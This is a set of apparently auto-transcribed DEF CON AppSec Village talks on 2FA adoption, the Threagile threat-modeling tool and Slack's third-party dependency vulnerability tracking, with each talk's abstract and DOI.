abysmal. There's a few reasons for that. This is especially abysmal for opt into FA. And so last month, DHH on Twitter, who works for, you know, he works for base camp, I think, and is behind the new email platform. Hey, was asking about how the opt in rate for different companies was for consumer 2FA. And companies willing to share this data say that's usually somewhere between like one and 2%, depending on the type of platform, depending on how you're getting users to turn it on, you know, you probably are going to have a pretty low rate of adoption here. So he mentions that base camp was at a poultry 1%. And one of the observations behind this is that, you know, there is technology like this, technology is available to help mitigate the risk and improve the consumer experience. But it often goes unused. And so I think this is one of the things that we as security professionals and people that have the ability to encourage people to opt into these more secure measures need to be considering how we can push people in that direction without increasing too much paranoia. So in terms of 2FA adoption, a 2019 BYU study found that people were willing to add 2FA to their accounts if they saw the value in the account. But 13% of participants just thought that the inconvenience was too high, no matter what. And that's because a lot of people just believe they're not a target. And so this research participants said, I just don't think I have anything that people would want to take from me. So I think that's why I haven't been very worried about it. And you can see this with a lot of people in your own life, they don't understand the risk that's associated with all of their accounts. And maybe that's okay, like maybe you don't need to be adding 2FA to, you know, the pizza delivery app that you're using. But how do we encourage people to add stronger authentication methods beyond passwords to things like their emails and like their bank accounts and other places where that level of paranoia is perhaps justified? So hope is not lost here. Awareness and adoption have almost doubled in the last two years. There's reasons for this. Bitcoin has spiked a couple of times within there. But there's other things that we might be able to attribute this to. And so one of these is how we drive adoption of multi factor authentication and websites are getting more savvy about how they're getting people to turn on 2FA. But unless you're somebody like Coinbase, you're probably not going to make two factor authentication mandatory. But you do have other options than just hiding it in profile settings where people aren't going to think to go get it. And so you can prompt people when they log in, you can offer product incentives, you can have a really annoying and persistent login prompt that is telling people that they need to turn on additional factors for authentication every time they log in. The more annoying you are about it, the more likely that people are going to be to turn it on. But that's also going to increase the friction and you don't want to annoy your customers too much. So we do know strategies like product incentives work from looking at the Google trends for 2FA searches. So if you can guess what the spike in August 2018 was, it's only gone up from there, but it was pretty flat for many, many years leading up to that. That was when Fortnite decided to offer in-game incentives for its users to turn on 2FA. And so if you're not familiar with Fortnite, it's an incredibly popular video game. And in video games are some of the people that are gotten most creative with the incentives that they're offering people. One, because there's in-game trading that has real monetary consequences to their users, but two, because some of the incentives that they can offer don't actually cost them a lot of money. And so now even two years later, three of the top five related search queries to 2FA have to do with Fortnite, three of the top five related topics to 2FA have to do with video games, Epic Games is the company that owns Fortnite. But they aren't the only ones that are offering incentives. Lots of gaming companies are offering incentives around that. You can see lots of examples there, but there's other companies that are offering product incentives as well. So a good example of this is Mailchimp will offer you a 10% discount for three months for users that turn on 2FA. And so you can understand kind of the trade-off here of what it would be valuable to your company, like what is the account takeover risk? What is the loss that you're experiencing from something like this? And does it make sense for you to offer some product incentives or discounts to your customers that might get them to opt into additional security? And so like anything, you want to make sure that you're going to measure how effective this was. So ideally you would be setting these measures before you embark on this kind of book journey, but some of the things that I encourage people to think about as they're measuring the effectiveness of their authentication strategies, like this is going to depend on your business, but here are some of the options that you might have, just total losses due to account takeover. You probably want to see that number go down. You might want to care about the total number of compromised accounts too, decreasing the number of customers that are actually having their accounts taken over. One thing that I do think is really important to look at is just the support costs related to the losses. So if you're somebody that's starting to require or encourage a lot more two-factor authentication, there are going to be additional support hurdles that you're going to come across. So especially when it comes to the account recovery side of things, people are going to get locked out of their accounts more often and you want to have a smooth path, hopefully self-service, hopefully you've enabled three or four factors so that they can gain access to their accounts, again if they lose access to any one of their factors. But you want to make sure that you have also equipped support with the tools to make sure that they can securely and safely get people back into their accounts, even if this is going to take more time out of the support team, it might be worth it overall. And finally, you just want to make sure that user satisfaction is at least staying the same if not going up. If you're doing something like having really a persistent login prompts for turning on 2FA, you might want to make sure that you're not annoying your customers too much overall. So there's definitely no one-size-fits-all solution here, but the advice that I end up giving a lot of folks boils down to something like this, which is to delight your most security conscious users. You don't want people that are paranoid, with good reason, have higher security needs and concerns to be upset the lack of options that you're providing, but you do want to provide options for the rest. You don't necessarily need to force everybody on your consumer website to have TOTP or Yubiqui or anything like that, but you want to make sure that it's usable for people depending on the risk that they're willing to accept. Because like the security researcher, Cormac Hurley says, when we exaggerate all dangers, we simply train users to ignore us. So I hope I've given you some inspiration for how to think about your authentication systems. I'll be around. You can find me on Discord. You can find me on Twitter. If you have any questions, once again, my name is Kelly Robinson, and thank you for listening.
|
Security professionals agree: SMS based Two-factor Authentication (2FA) is insecure, yet thousands of companies still employ this method to secure their customer-facing applications. This talk will look at the evolution of authentication and provide a data-driven analysis of the tradeoffs between the different types of factors available.
|
10.5446/51621 (DOI)
|
Good morning, good afternoon, and good morning to our fellow viewers across the globe. My name is Joe Christian and I'd like to personally welcome you to day three of AppSack Village at DefCon 28. First, I'd like to thank our sponsors for checkmarks, Google, and offensive security. Without them, we could not have provided you all this amazing village this year. I'd like to issue another thank you to DefCon and all of our volunteers for their blood, sweat, and tears poured into this incredible effort. Lastly, I'd like to thank the community for supporting us another wonderful year. This village is for you. With that being said, I'd like to introduce our first speaker today, Christian Snyder. Christian's talk is titled ThreadGyl, agile threat modeling with open source tools from within your IDE. Christian has pursued a successful career as a freelance Java software developer since 1997 and expanded in 2005 to include the focus on IT security. His major areas of work are penetration testing, security architecture consulting, and threat modeling. As a trainer, Christian regularly conducts in-house training courses on topics like web application security and coaches agile projects to include security as part of their processes by applying DevSecOps concepts. Christian regularly enjoys speaking and giving trainings on major national and international conferences. Please give a warm welcome to Christian. Hello. Welcome to my talk. My name is Christian Snyder and I'd like to introduce you to ThreadGyl, the new open source toolkit for agile threat modeling. I'm working as a freelance security architect, penetration tester, and trainer, mainly focusing on areas like DevSecOps, security architecture consulting, and agile threat modeling. With ThreadGyl, the idea is to bridge the gap between classic, more workshop-like threat modeling approaches and agile development with a fast pace of rollouts and a fast set of commits and eventually using DevSecOps approaches a very agile and very quick way of rolling out into production and not neglecting threat modeling in these kinds of setups. The idea is to let developers create some declarative threat model inside their IDE that is basically not required to go to a different tool or switch to work mode of operation, just maintain in a declarative fashion everything about your application, your architecture, in a very simple to read human readable YAML file. That includes like classic threat modeling approaches, the data assets, the components, technical components, and the communication links between them, whether data flows, and trust boundaries that might be crossed by communication links. That YAML file can be checked in in the source tree as any other artifact, so the benefits of that, it's diffable, it's collaboration capable, it's testable, verifiable, you can easily just start along with the project. And the modeled elements, especially the technical elements in that YAML file contain very detailed levels of the technology and the protocols that are chosen in order to be able to have a very good risk generation from some kind of risk rules. So ThreadGyl has a set of built-in risk rules that analyzes these kinds of sets and treats this as a connected graph of components and deriving risks, potential risks, threats, hardening recommendations, documentations, model graphs, data flow diagrams, and different output formats from that. And even custom risks can be added because as any tool you cannot identify every risk with a tool, so you need to have some manually identified risks that can be added to that model as well, because sometimes in these kinds of workshops you come up with new risks that have not been identified by any kind of tool. And this can be added into the YAML file as well. ThreadGyl is a technology where, way of modeling your architecture, so you define what type of technology is used, what protocols are used, so it understands from that whether it's encrypted or not, for example, has around 40 risk rules, so it's growing, and you can even create custom risk rules. It calculates some attack attractiveness, some data loss probabilities, more on that later on, and you can even automate things using model mark pros in a very wizard-style approach, and even the risk mitigation can be maintained in that YAML file, so that even the risk tracking and the remaining risks that you want to accept are documented that way. And of course, it's released as an open source software. So in ThreadGyl, basically you run it as a command line interface, it's shipped as a Docker container, or you can execute it as a web server with a REST interface. And you just see the command line interface with just a few of the many switches and options that you can use. So the first steps within ThreadGyl are that you create either a minimal stop model that can be created from ThreadGyl as well, or a filled example model if you want to play with it and see how it works, and it's basically containing that YAML file that's the input into ThreadGyl, the data assets, the technical assets, the communication links, and the trust boundaries. And a little bit more if you like. So here you see the YAML example of data assets, customer contracts, has some kind of owner, some kind of origin, especially the confidentiality, integrity, and availability ratings are interesting, so you can rate the data assets how confidential, for example, they are. And you can model technical assets as well in that YAML file. So for example, here a Apache web server where you can define, again, the confidentiality, integrity, and availability ratings, but you can also define a technology out of a bunch of possible technologies. And you can define a little bit more whether it's used by a human that would be more like being a client or browser, for example, what type it is like a process external entity or data store. And you can tag it if you like and whether it's encrypted or not. So a few questions you can answer there as well. Then you can reference data assets that are processed or stored on that kind of technical asset just by their ID. So from the ID referencing, ThreadGyl learns the distribution of data and the distribution of data that's processed on those kinds of technical assets. And then you just model the communication links. So basically pointing from one system for one technical asset to another component, another technical asset. So it's an outgoing communication link. And you can even attribute that with the kind of protocol that's being used, whether it's let's say here HTTPS or it could be FTP or whatever, whatever you'd like, a lab. That's a big list of protocol values that you can choose from. And ThreadGyl even knows whether it's an encrypted or not encrypted protocol. You can define what kind of authentication is happening, whether it's not authenticated, that communication link or just uses credentials or a token based approach. And if it's authenticated, you can define with what kind of authorization, either the technical user or an end user identity or something like that. And you can answer a little bit more questions and you can reference the data assets that are sent and eventually received from that kind of communication link. Finally you model the trust boundaries. These are basically the, let's say, virtual network areas where you want to have some kind of network trust boundary between them or in a containerized world, eventually namespace isolation or something like that. You can model that. So different types of trust boundaries are existing. And then you just reference the technical assets that are used inside. And if you do nest trust boundaries, definitely something that's possible, you can reference them as well. Then when you execute the schedule on the command line, it process the YAML input and applies the risk rules. So there are lots of built in risk rules and you can even add your custom ones and it creates some nice output. First of all, here's an example. It gives a model graph. It generates a model graph that you can see whether you have modeled something wrong or something is missing from your architecture. The colors in the lines as well as in the shapes are referring depending on the data ratings that are being stored there to the sensitivity of that kind of asset. So red border means that there are very sensitive data stored or red line means there's very sensitive data being transferred. And the color like the yellow ones means there's custom develop code and the shape is a little bit depending whether it's a data store process external entity or client used by a human. So there's a set of semantics behind these kinds of colors. And it generates a PDF and Excel report. So very long in terms of being also some kind of documentation artifact. And it has this kind of report has some redundancy in it because it has two different views. It has a view of risks by vulnerability category and a view of risks by technical asset. So let's dive a little bit into the reports that have been generated. You see some management summary with some pie charts depending on the risk severity and also on the risk tracking state. You can add your custom management summary text as well. And you have got the impact. That's basically the impact from the identified risks, including some individual added one here, the critical one, more on that later. And also you can define and see the risk mitigation here. So the risk mitigation chart, you see bar charts going up. So we're basically the distribution of the risks that have been identified a group by the tracking state, which you maintain as well in the ML file. So you can have something that's in progress here in blue or mitigated in green or something that has been accepted as a risk in pink or the red ones are just unchecked. And you've got the impact analysis of the remaining ones. Also for classic threat modeling, you do have the stride classification of the identified risks, spoofing, tampering, and repudiation, information disclosure, and other kinds of categories. And you've got a assignment by function. So who, what kind of party in a corporation or a team shall basically handle that kind of risk. So who should address that. So is business side, architecture side, development, operations, something like that. Also ThreadGal calculates the RAA, the relative attacker attractiveness value, which is just a percentage value ranging from 0 to 100%. The higher the more attractive for attackers, the technical asset is. So these values are assigned to technical assets. And there's an algorithm which is pluggable. You can plug in your own custom algorithm if you like. And that algorithm basically treats the amount and the sensitivity of data on the assets and as well as the communication links and the paths that attackers can take to go to these. So if a sibling of another system is having less sensitive data, but connects to that very high sensitive data carrying system, that kind of neighboring system is also rated a little bit higher. And DLP data loss probabilities are also calculated. So here you see inside the report, a graph which here on the left side contains lots of red data assets. And the right side of the shapes are the basically the components and the errors depending whether it's a dashed or a solid error is whether it's processed on that asset or stored on that asset. And depending on the sensitivity of the data, you can see here if you eventually have some risks where you might want to handle that. And the colors here reflect the risk of the data loss probability, which is basically depending on how many data assets, how many technical assets the data assets are stored or processed and how many risks are there on these assets that might have a blast impact of losing that data. So in the detailed report, you even have the individual risks listed that you should mitigate, especially the red ones, which would yield the biggest benefit of going from red to amber or even a better color that you're not risking the data loss there. So that way you can basically prioritize depending on the data risks that you might lose them, your efforts of mitigation of those identified risks. And the risk mitigation recommendations are also created here. So you see some servers at Likers forgery or XMX, Trone entity attack in these examples here where you have risk mitigation texts, including links to the OWASP ASVS chapters and to the OWASP cheat sheet. That's basically if it's available for that kind of risk, giving the developer teams some kind of hints on how to mitigate that. The risk instances are also obviously inside the report. Everything is linked and clickable so you can click and easily navigate around in that report and you have it either by group by the vulnerability type on the left side or on the right side, you've got the risks by a technical asset so that you can get from that kind of view also to the risks and the descriptions of how you can mitigate that. Of course you get an extra report as well for easier filtering, sorting and stuff like that, same data, different format. And being DevSecOps ready, that means the results are also available as a JSON output. So you can process them inside Jenkins or any kind of other GitLab CR or whatever you like, some kind of DevSecOps pipelines. So CI CD pipelines can then execute ThreadGal as a command line or via the rest server if you like depends on what you want to do. And the result is a JSON file listing the remaining risks and their distribution across the different severity levels and then you can for example automatically break a build if a system includes or a build includes some yet unchecked high risks. And the risk rules, that's a set of constantly growing risk rules so there are around 40-ish something in it and you can extend that with more risk rules if you like. So that's growing on a day by day basis. And risk rules are written in Go inside ThreadGal. ThreadGal is itself written completely in Go. And you see an example for a risk rule, this is an LDAP injection so you have some category definition where you have the texts and the cheat sheet links and basically the meter data that the report is generated properly for that kind of risk and on the right side you see the very simple code to identify those risks. So it's basically some kind of graph identification from the assets that you modeled and the communication links that you modeled. You can even if you like add manually identified risks to ThreadGal in the same YAML file. So the same input file can include manually identified risks. These that are not usually identifiable by tool. So for example in a classic threat modeling workshop you identify those additional risks and you do not want to track them in a separate way. You want to keep them in the same way that you track the tool based identified risks inside ThreadGal and that can be done by simply enhancing the YAML input file with individual risks. So here you provide the meter data of the text, what happened and that kind of risk that you identified, how it should be mitigated and stuff like that. Here you provide that basically as values inside the YAML file and on the right side you see that this risk has two instances. So it has for example been identified, it's some database and some file system server here and you can even link to the technical assets that are the most relevant, have the most relevance of losing that kind of data when that risks manifest itself. So that way the blast impact of the data loss probability is also reflected with that kind of manually added risk. You do have very good editing support in IDEs for YAML files, that's definitely something that's been around for some time, even in VR if you like. So there are many YAML editors available, it's easily readable by humans. For example in my IDE I do have here on the right side a tree that I can click to navigate inside the YAML file so that it's automatically populated from the structure of the YAML file so that's definitely something that's having a very good support of IDEs. Doesn't stop there, it goes even into schema validation and auto completion, so ThreadGal supports IDEs by having a YAML schema available for the ThreadGal model. That basically means you can import that YAML file into the IDE and then you have some kind of automated checking of the syntax and you get some error flags, for example here on the left side I've got a typo web server with many errors, so that's definitely flagged as an invalid technology type and that's something that has been validated by the IDE due to the schema and that schema gives me also some kind of auto completion. So when I type on the technology web and hit control space the popup basically includes everything that begins with web like web application, web server or what else. So that's some kind of auto completion that you just get for free by simply importing the ThreadGal YAML file schema into your whatever IDE or YAML editor you use. You can also have some kind of live templates for quicker editing on the creation of those elements like technical assets, communication links or data assets or something like that. So importing these templates in major IDEs allows you just to hit our tech asset enter and bam you've got a pre-populated template where you just give it a name and then you tap through those elements and hit control space to open the auto completion popups and that's a little bit like the Zencoding style. Definitely something nice. And we do have model macros inside ThreadGal. That's basically some kind of interactive wizard. So that's a little bit like a state machine that you can create and each model macro has a set of questions that are being asked in a sequential interactive way and it reads each model macro reads the YAML file of an existing model and it asks you questions of what you would like to do and so we do have different model macros like adding a build pipeline or adding a vault or adding identity provider including an identity storage to the model and that way you can codify and reuse and make this a little bit individual due to the questions that you ask the user, the kinds of repeating model elements that you have in your corporation or in your teams and make them these adding these modifying the model files that way in a very easy way. So the plug-in interface also allows you to create your own model macros. So how does this look like? It's on the command line. So you do have for example here an add build pipeline model macro with just a few questions that you answer and then you can select on which kind of components this build pipeline should deploy for example. So it reads the model and it modifies it accordingly and you can create new trust boundaries for that is it either push-based or pull-based deployments more on the GitOps style and then you've got a summary like a dry run of what would be added to the model and adding new data assets, adding new technical assets including the communication links, adding new trust boundaries so all these modifications are done automatically then and the result is you get something more out of that. So you get the communication paths added as well. So what about risk tracking? So inside the YAML file you also have a way to track the identified risks by a unique risk ID and you can even group them with byte cards to have some kind of sets of risks of the same type for the same component or something like that to be tracked in the same style and you can assign a status like whether it's unchecked that's the default state if it's not being tracked yet or the risk is in discussion or whether the risk has been accepted and it just remains as a remaining risk or whether it's in progress so you're working on mitigating it or it has been mitigated or whether it's a false positives sometimes tools also have false positives definitely. And you can add a justification optionally you can add a ticket ID, a date and a tracked by name tag so you can track that in a very good way and even a model marker is existing that reads an existing YAML file, applies the risk tracking and then it generates the yet untracked risk instance IDs and they're tracking with the unchecked still obviously state that you can then individually shift to some kind of other state. And out of the risk tracking definitions in the same YAML file you get the risk mitigation state you just saw recently here in the talk in the PDF file you see it on the right side. What about bigger models? Of course even bigger models work well and even way bigger models work well something we did in beta testing of Threadal definitely even way bigger models work quite good. Also a REST server is existing inside Threadal so you do have some in the Docker container some way to start it in expose a port and that port is basically giving you a way to use Threadal like a REST API that means you can send in the YAML file and get a zip file where all those artifacts are in that Threadal generates and you can also in the next version then basically create a model on the server side that start that way in encrypted fashion and then you can add data assets to it, you can add technical assets to it, you can add communication links to it, apply the risk tracking import or export the model file if you like something like that and if you want to play a little bit with that there's even a playground online it's just on runthreadal.io. So what are the possible effects of modeling risks or modeling threats in applying threat modeling actually in some kind of YAML file and letting the risks and the threats being generated by an open source tool that way so not leaving the IDE making it pluggable the risk rating scheme or the risk rules means that corporations can even have their individual policies coded in some kind of easy to code and go long risk rules and these custom code risk rules can analyze the model graph according to the corporate individual policies also if many more projects are using it inside a corporation you can then for example have some kind of uniform documentation of the system landscape build bottom up project by project system by system can try to link them in a very good way if you like and it's built by the dev teams and their IDEs they're not leaving their tools of choice and they do it in their favorite IDE and it's just running along within the code base checked in and some kind of YAML file that's it so it's easy to keep that up to date compared to classic threat model approaches so it's a way to have continuous threat modeling it's easy to instantly regenerate from some kind of project the risk landscape so if something changes for example so for example a data classification changes being more confidential or some component is moved into the cloud so something like that then you can just regenerate it and see if some new risks might emerge from that kind of change and you can do that instant risk regeneration even on corporate level so for example when a policy changes or new policies introduced some new regulatory policies for example then you can adjust your custom risk rules accordingly or create a new one and then just execute the red jar on all of your projects and then you might see which of these projects eventually have some kind of to do to mitigate some newly emerging risks not matching something like a new policy that has been put into place also CI CD pipelines can check the generated JSON to automatically fail the build or at least flag it as unstable something like that if some unmitigated high risks are still there so having the risk tracking state inside Threadal and having the remaining risks that way you can also just evaluate that data in the JSON file and then you can just fail the build if you want to avoid an automatic rollout into production where new high risks have not yet been checked at least so that's something that is definitely ready for DevSecOps approaches that means Threadmodeling continues Threadmodeling becomes part of a DevSecOps approach and that's basically what Threadal is about about agile Threadmodeling. Hopefully security is then less bottleneck for Threadmodeled signoffs that basically means the security team can more focus on the individual risks and not the standard that have been easy to identify in some kind of coded risk rules also that's easy and it's shifting things more on the left side so that by development teams beginning from early on to maintain and create the YAML file then you have a very early integration of Threadmodeling that doesn't do any kind of bottleneck effects on your security. So it's released as an open source tool the website is Threadal.io there's a PlayGuard available, Run Threadal.io, the source is available on GitHub and Docker images are available as well if you have any questions feel free to ask you've got my contact data there as well special thanks definitely to those valuable feedbacks from all the beta users and especially to those here like in alphabetical order very early adapters of Threadal and very valuable feedback thanks and I'd like to thank you as well so a little bit of Q&A if you like and look forward to seeing you later in the chat.
|
The open-source tool Threagile enables agile teams to create a threat model directly from within the IDE using a declarative approach: Given information about the data assets, technical assets, communication links, and trust boundaries as input in a simple to maintain YAML file, it executes a set of over 40 built-in risk rules, which can be extended with custom risk rules, against the processed model. The resulting artifacts are graphical diagrams, Excel, and PDF reports about the identified risks, their rating, and the mitigation steps as well as risk tracking state. DevSecOps pipelines can be enriched with Threagile as well to process the JSON output.
|
10.5446/51622 (DOI)
|
Hello and welcome to 10,000 dependencies into the sea, exploring and securing open source dependencies. My name is Greg Horton. I'm a product security engineer at Slack. And I'm Ryan Slamo, an associate software engineer on the product security foundations team. At Slack, APSAC is product security. Our project organization is split into classics and foundations. Classics were the original team and they focus on most of the traditional APSAC responsibilities, like reviewing new features, penetration testing, and running a healthy bug bounty program. I'm on the foundations team, which focuses on reducing risk through automated tooling and creating secure by default libraries and patterns. Both of these teams work together to ensure the security of Slack, the product, using a multifaceted approach. For some context, what is Slack? Slack is a channel-based messaging platform, and with Slack, people can work together more effectively, connect all their tools and services, and find the information they need to do their best work, all within a secure enterprise-grade environment. Let's begin by talking a bit about the Slack stack. Users expect Slack to work everywhere. To that end, we use and are a partial maintainer of the Electron project for a consistent experience across devices. In practice, this means our front-end web code also runs in all of our desktop clients. Our back-end is primarily in hack-lang, Facebook's fork of PHP with strong typing and other enhancements. We also have some services written in Go, like our caching layer. Finally, our mobile apps are primarily in Swift and Kotlin, but we won't be talking about them much today. Today, we'll be talking about an OWASP top-ten issue, using components with known vulnerabilities. Specifically, we'll be focusing on vulnerability management for third-party dependencies. Our story today begins with an intern project. Matt Dwanzek and I, who are now full-time engineers at Slack, were interning on the Product Security Foundations team last summer. When we got there, we were given an open-ended project of understanding and limiting our dependency risk. Today, we'll walk you through our journey building a tool, and Greg will walk you through how we implemented the tool and built a process around it to actually limit the risk at Slack. Modern code bases often require tons of third-party code. At Slack, we have one main repository that contains our entire front-end and most of our back-end. Our main repository currently requires over 6,500 packages. A year ago, we had half that. This trend would be concerning if we didn't have systems in place to limit risk. All of our first-party code has to be reviewed, but what about random stuff you find on GitHub? That's exempt? Clearly, some process must be in place to manage risk. It's important to note that we have a mature process for adding packages, and the count still doubled in a year. For PRs that add packages, developers have to explain why it's needed. Packages must be actively maintained and save meaningful engineering effort over just building the functionality ourselves. Additionally, all packages are assigned a team or a directly responsible individual to update them and maintain them. This is especially important for security updates and fixes. So how did our package count double? In Word, NPM, we only directly require 350 packages in our package JSON. However, when you resolve the nested dependencies, our dependency tree expands to almost 6,500 unique versions of packages. Running this much third-party code can be a risk. The downside of using common software is that we often find out about vulnerabilities at the same time as everyone else. Let's take a look at some examples of related issues. One of the most notable was Equifax. Equifax got hacked because they were running an old version of Apache struts that had known vulnerabilities. This hack leaked 143 million social security numbers. Preventing this could have been as simple as upgrading their version of Apache struts to one that did not have publicly known vulnerabilities. Vulnerabilities are also discovered in old versions of popular NPM packages. For example, both of these advisories were issued this year. NextJS and AngularJS are respected well-maintained packages, but running those in your production code bases without adequately maintaining them is a recipe for disaster, because new vulnerabilities can be discovered at any time, no matter how many years you've been running the same code. NPM also had issues with malicious code in popular packages. For example, EventStream, which was a popular NPM library, required a dependency that had been compromised, and that compromised dependency included a targeted Bitcoin wallet stealer, and that malicious code was downloaded over 8 million times. ESLintScope is an even more popular NPM package used for linting JavaScript code, and a compromised version was uploaded that exfiltrated NPMRC files, which contain package publishing credentials. Those credentials could allow an attacker to push a new version of a package as a semfor patch with malicious code, and because of the way NPM's semfor works, all installations of that package would automatically upgrade to the malicious code. And here's for some figures that might be slightly biased. Sneak found an 88% increase in library vulnerabilities over the past two years, and 78% of vulnerabilities that they found are in indirect dependencies. Just take a look at our dependency tree from earlier to understand why. When we only require 345, but end up with almost 6500 packages, there's a lot more code beneath the surface than on top of it. And we're not the only ones who have this problem. Our customers know about this problem, and they ask us about it. We need a good program in place so we can show them that we take care of their data and we limit risk. What do we do about this problem now? When we started, we defined three goals for a good solution. The first is we want to detect vulnerabilities as soon as they're publicly available, because we want to be on top of the fixes as quickly as possible. Second, we want to track any vulnerabilities or weaknesses in our codebase. We want to be able to have insight into where we have risk, and so we can better fix it. Finally, we want to alert when we have a problem. No developer should ever have to think, oh, I should scan my repo before I deploy to production. We want to alert when we have vulnerabilities, so this just happens automatically. The next question we asked was, can we use an off-the-shelf tool? But our requirements ended up making that surprisingly difficult. First of all, we use Hackline, which is not a popular language outside Facebook, so it was difficult to find vendors that supported it. Second, we use GitHub Enterprise rather than GitHub Cloud, which makes it harder for Dependabot, because Dependabot still isn't out for GitHub Enterprise, and it was even further from being out a year ago when we began this journey. Next, we needed a tool that will scan the entire dependency trees. Knowing about vulnerabilities and packages we require directly isn't enough. As we saw earlier, there are so many more packages beneath the surface, and we need to make sure that those are a stable foundation that we can build our app on. And finally, at Slack, we're heavy users of Slack as a product. All of our alerts and things like that just go in Slack. So we need a tool that has support for routing alerts for different code bases or packages to different teams. And finally, you might be saying, oh, we're a vendor and we have a tool that does all that. But we're still a relatively small company, and we need something that's not going to cost us millions of dollars over the next few years. So we built Asify. Our solutions to the three points mentioned earlier were first, the indetection. We run daily scans of our code bases to both figure out what packages were requiring. And also, we upload those packages to the Sonotype open source vulnerability index and see if there are any new vulnerabilities that have been reported for our packages. Second, we built a dashboard to track the status of repositories as well as tracking remediation efforts for individual findings. And finally, we built robust Slack alerting, which will be covered more later. Asify supports three package ecosystems. The first, of course, is Hackline, because that's our backend and that's where some of the most dangerous possibilities are. We added custom metadata to track composer packages upstream because we had to manually fork and vendor some of these packages to add strong types and other Hackline features. Second, we added NPM because NPM is the biggest defender for vast amounts of packages, and we found by far the most findings coming from NPM packages. And finally, we added Go support because a number of our high value services like our caching layer are written in Go. Here is what the Asify dashboard looks like. This is an example repository created for this demo just to show you what it looks like when you scan a repository. So we support scanning multiple branches, which could be used potentially for future CI integration. Here we have an example finding page. This is for Node Forge, which was being pulled in in our sample repos package JSON. Node Forge has a weakness, but we don't actually require Node Forge. Instead, we require a Google Auth library all the way on the left. We built out a dependency graph tool because we want our developers to understand where the vulnerability is coming from and what packages need upgraded or removed to fix the issue. Here's a more complicated dependency graph. This is from a dev dependency. The weakness was on the right in is URL. However, if you trace back all the way to the left, it was actually some gulp plugins we were using as part of a build process that were pulling in the weak version of is URL. And finally, like any good security tool, it comes with dark mode. Now I'm going to hand things off to Greg to cover everything that happened after the original development of the tool. Thanks Ryan for that great overview of the tool. So now that we have this fully featured tool that did everything that we wanted, it was time to integrate it into our wider processes here at Slack. So this would be easy, right? We have an app that scans our repositories, looks at our third party integrations, sees if there's vulnerabilities, and then lets us know about them. So our first workflow for this tool was that Osify would scan daily and then post to a Slack channel, any currently known vulnerabilities. And using the power of Slack, we could make Slack notifications that were actionable, meaning that we could give the information that is needed for quick remediation. They were nonobtrusive, so we could set those notifications to snooze or ignore if they weren't relevant to us. And then make them make the configurable so we could notify individual users and specific channels about these dependencies. Here's an example of what those looked like. So as you can see this dependency detection is the app. It's scanned a repository, it found some vulnerabilities in some third party libraries, and it would tell us about them. And as you can see also, you could set them to ignore, you could snooze them, etc. But the problem with that is that this channel was way too noisy. Every single day it was posting all the vulnerabilities that were found and they haven't been remediated yet. So it would repeat a lot of the ones that we'd seen the day before. Maybe we didn't want to ignore them yet because they were still relevant or we were still trying to find somebody to fix them. But it was a very long list and so we couldn't really work to work them down in this format. And also blindly throwing them into a channel made it so it was everybody's problem, which in practice made it nobody's problem. Nobody took initiative to see which vulnerabilities were actually a threat to us. And nobody was taking responsibility to fix them. So it was pretty ineffective at solving our main problem at first. So we had to go back to the drawing board and figure that out. So we had to admit that ossify, you know, was an effective tool, but it was not only reporting vulnerabilities, but it was also acting as an internal ticketing system for something we wanted to maintain long term. We wanted to ossify to do one thing well, find vulnerabilities and report them. And to do this, we had some prior art that we could work from to figure out the best way to do that at slack. And that answer was Jura. We have a Jura system. We have security tickets that go into our Jura that can be action upon by developers. And so our solution was to put it in Jura. You know, at slack, we have a method already for triaging security based tickets that come from multiple sources. Say if we have bug bounty reports or internal findings. Our SLAs or service level agreements are 180 day for low tickets, 90 days for medium, 30 days for highs, and then seven days for critical findings. So pushing upgrading these vulnerabilities to a ticket in Jura, put these already into the into the processes that our developers know it doesn't add in any more friction. And it puts them into an established workflow that also ties to company wide objectives. So upgrading these libraries just can't be another thing that developers ignore. They have to do it to meet their OKRs. So now that we had a new flow, we had a new way of dealing with and finding these vulnerable libraries. So our new flow is that I would find the vulnerability and then throw it right into Jura and would file a ticket. If multiple vulnerabilities were caused by the same package, we would roll those up into the same ticket. Say you have a couple of highs and a few mediums, but that all would be remediated by upgrading a single package to a certain version. That would be one ticket. So we weren't making multiple tickets for multiple vulnerabilities per se. Just if you upgrade this library, these are all soft. Now we can talk about our triage process a little bit. So the first step in this would be that the ticket be filed and the product security engineer on call with triage it. So our triage process is just enough so that we can find how serious the vulnerability is in our systems. We would read the proof of concept from the sonotype database and then check our source code to see if we are in fact using those vulnerable functions because if we weren't, then it wouldn't be a critical vulnerability for us. It would be a low or even maybe a non a non fix. If we, if we are using that we might try to reproduce the attack, or if it's used in multiple places, we're just going to determine that it's enough to determine a severity for fixing. If it's used in hundreds of places, we can't test every single one. So we would then recommend it be a medium or high depending on what thought. And we're also going to review the fix that's in the upgraded version, just to see if there's anything more we need to consider when implementing the update. All of this is just to either confirm the severity based on the CVSS score or adjust it as needed. From there, you know, we would find the responsible team. So after determining whether or not we could we get exploited, we need to find the responsible team to fix that that team is then going to be responsible for mediation in the in the SLA time that we've already determined to based on the severity. Lastly, once the package is updated, ossify is going to go in and automatically see that that version is no longer used and will remove it from our list. And then for the vulnerability is remediated. Now that we have a working process and that fits into what we're already doing at slack. There's still a lot of future work to be done. Right now, we're working on getting a clean state for vulnerable packages and working down our backlog to determine if the packages are currently being that are currently being flagged are vulnerable and get them fixed. Next, this process as you can tell involves a lot of manual work still. There's a lot of manual work for the product security engineer to find out who owns the vulnerable dependency and also seeing if it's exploitable. So we would like to figure out a way to automatically figure that out. Instead of having that be a manual process. That's just going to be looking into how we can track when new libraries are added. And thirdly, we'd love to integrate this process into our CD CI pipeline. So packages that are vulnerable aren't uploaded to our code base. So on commit, it would, it would run the scanner look for any open vulnerabilities and then either block that or let it through if there aren't any. Thank you so much. Special thanks to Matt who did ossify development for us and Nikki and Oliver for our previous version of this talk. If you have any questions, we'll be in the discard chat to answer them. Thank you.
|
Come on our journey of creating scalable tooling and processes to automatically identify vulnerabilities in third-party libraries and handle the question of “ok we found this, who’s going to fix it?”
|
10.5446/51577 (DOI)
|
